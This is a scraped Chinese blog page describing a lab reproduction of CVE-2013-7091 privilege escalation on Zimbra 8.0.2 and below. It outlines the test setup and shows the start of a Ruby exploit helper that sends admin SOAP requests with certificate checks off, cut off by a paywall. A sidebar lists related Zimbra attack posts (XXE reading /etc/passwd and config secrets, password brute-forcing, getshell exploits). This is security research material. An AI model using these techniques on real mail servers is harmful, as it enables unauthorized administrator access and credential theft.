利用CVE-2013-7091漏洞完成对zimbra 8.0.2以下版本的远程用户提权

最新推荐文章于 2024-08-04 16:53:26 发布
最新推荐文章于 2024-08-04 16:53:26 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: 漏洞调试 文章标签: zimbra cve-2013-7190 邮件服务器提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41732430/article/details/87927747
版权
本文介绍了如何利用CVE-2013-7091漏洞在zimbra 8.0.2及其以下版本中进行远程用户提权。首先,详细阐述了在ubuntu 12.04LTS环境下安装和配置zimbra 8.0.2的步骤。接着,展示了利用ruby编写的漏洞利用脚本ultils.rb和run.rb。最后,通过在开放7071端口的内网环境中运行脚本,成功创建新管理员用户,验证了漏洞利用的成功。
摘要由CSDN通过智能技术生成

一、环境安装

首先完成在ubuntu 12.04LTS环境下zimbra 8.0.2的安装及配置。

本机DNS解析:

 启动安装完毕之后的zimbra:

进入管理员界面https://mail.server2.com:7071创建两个普通帐户收发邮件测试zimbra可以正常运行:

二、创建漏洞脚本

漏洞脚本使用ruby编译,并且在windows环境下运行,共有两个rb文件。

ultils.rb:

require 'net/https'

class Utils

def request_soap_admin(*api_call*)

  @request=api_call

  

  soap_client = *Net*::*HTTP*.new( $host, 7071 )

  soap_client.use_ssl = true

  soap_client.verify_mode = *OpenSSL*::*SSL*::VERIFY_NONE

  

  soap_path = "/service/admin/soap"

  

  soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"

  

  response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )

  

  if response.body.match(/Error/)

​     error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]

​     puts &
最低0.47元/天 解锁文章
BBBMouse
关注
专栏目录
zimbra漏洞利用
kzyyx的博客
08-31 4247
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。 1.首先通过利用CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器用户口令在线爆破。
乌云漏洞库镜像站_本地搭建乌云平台_详细网络安全自学路线
最新发布
2401_84915584的博客
08-04 324
最近开始挖SRC了,但是挖了两天还没有挖到,在网上找一些大佬的文章看看有没有技巧,学习一下经验什么的。许多大佬的文章都提到了一点——看乌云上的文章来学习思路。乌云在2016年...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
sxr__nc的博客
04-19 4682
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Zimbra 远程代码执行漏洞(CVE-2019-9670)环境搭建
sxr__nc的博客
04-12 1416
Zimbra是著名的开源系统,提供了一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。一体化地提供了邮件收发、文件共享、协同办公、即时聊天等一系列解决方案。
开源邮件平台Zimbra 出现新漏洞用户登录凭据可被盗
smellycat000的专栏
06-15 1827
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 邮件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者邮箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
Zimbra漏洞
公众号shadow sock7
08-19 1580
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
Androidroot源码利用CVE-2013-6282漏洞.zip
07-30
Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
cve-search:cve-search-一种对已知漏洞执行本地搜索的工具
02-25
cve-search是一种工具,可将CVE(常见漏洞和披露)和CPE(通用平台枚举)导入MongoDB中,以方便CVE的搜索和处理。 该软件的主要目的是避免对公共CVE数据库进行直接和公共查找。 本地查询通常更快,您可以通过...
CVE-2018-6882 Zimbra邮件系统XSS漏洞利用
weixin_30343157的博客
05-08 1500
CVE-2018-6882是一个存储型XSS漏洞利用漏洞可获取目标邮箱的收件箱、发件箱等邮件内容。也可以给目标邮箱绑定一个“辅助邮箱”,当目标邮箱收到新邮件时“辅助邮箱”也会收到相同的邮件,实现对目标邮箱的实时监控。 漏洞细节请大家参考这篇文章:https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vu...
Zimbra xxe+ssrf导致getshell
一个安全研究员
03-26 6315
我分析的第一个java漏洞
zimbra xxe+ssrf 导致 getshell
whatday的专栏
08-25 1432
前言 2019年3月13号,国外一名安全研究员在他的博客上公布了zimbra的这起漏洞,但是其中并未提到一些漏洞利用细节,在此我将整个漏洞利用过程进行复现。 原文链接:https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html#href1_ret 影响版本 Zimbra < 8.7.1 攻击者可以在无需登录的情况下,实现getshell Zimbra<8.8.11 在服务端使用Memcached做缓存
Zimbra
zhoumouren88的博客
08-27 1051
第一步:利用XXE读取配置文件 这里利用CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问。为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件。 上图中用红框圈起来的就是zimbra账号的密码,先记下来以后会用到。 dtd文件内容如下: 1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> 2 <!ENTITY...
Zimbra 0day exploit / Privilegie escalation via LFI
cnbird's blog
12-07 1959
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.
Zimbra SSRF+Memcached+反序列化漏洞利用复现
fnmsd的博客
04-12 8486
前言 之前懒了一下,没复现memcached反序列化的部分。 在看本文之前请先看完上一篇复现: https://blog.csdn.net/fnmsd/article/details/88657083 本篇复现基于8.7.11进行复现,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值